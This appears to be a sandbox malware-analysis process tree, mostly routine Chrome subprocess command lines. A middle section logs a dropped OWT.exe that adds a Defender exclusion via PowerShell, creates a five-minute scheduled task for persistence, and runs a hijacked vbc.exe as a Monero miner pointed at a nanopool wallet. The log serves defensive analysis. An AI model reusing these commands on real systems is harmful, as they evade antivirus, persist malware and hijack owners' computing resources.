C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5992 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6888 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6432 /prefetch:82⤵PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:12⤵PID:4488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵PID:4424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:4772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:12⤵PID:2520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:12⤵PID:3876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:12⤵PID:4652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:12⤵PID:916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:82⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:82⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:82⤵PID:1752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:82⤵PID:3368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6652 /prefetch:82⤵PID:2408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:82⤵PID:1056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1432 /prefetch:82⤵PID:3012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6628 /prefetch:82⤵PID:1336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:82⤵PID:1728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:82⤵PID:3132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:82⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:82⤵PID:3360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6868 /prefetch:82⤵PID:3032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:12⤵PID:3732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:12⤵PID:1252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:12⤵PID:3664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2856 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:12⤵PID:1928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:12⤵PID:4608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:82⤵PID:60
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:82⤵PID:4336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3156 /prefetch:82⤵PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6400 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:12⤵PID:4832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2580 /prefetch:82⤵PID:60
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6536 /prefetch:82⤵PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3164 /prefetch:82⤵PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵PID:3696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,8313304110618611353,3050686260969456256,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1692 /prefetch:22⤵PID:1444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,8313304110618611353,3050686260969456256,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2004 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1512
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1864
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4908
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵PID:1240
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
PID:4500
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4840 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵PID:4556
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --exception-pointers=71038760157184 --process=172 /prefetch:7 --thread=50963⤵PID:6028
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4556 -s 14403⤵
- Program crash
PID:4680
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:22⤵PID:4288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2032 /prefetch:82⤵PID:2768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:82⤵PID:2416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:12⤵PID:1120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:12⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:12⤵PID:1632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4548 /prefetch:82⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:82⤵PID:1248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:82⤵PID:3912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:82⤵PID:3316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:82⤵PID:428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:12⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:82⤵PID:3344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:12⤵PID:948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:12⤵PID:2320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵PID:1112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:12⤵PID:4788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:12⤵PID:4492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:12⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:12⤵PID:3912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:12⤵PID:3936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:12⤵PID:1084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:5104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:12⤵PID:4632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:12⤵PID:3208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,10288934112445070239,5997898288823538737,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵PID:4368
-
-
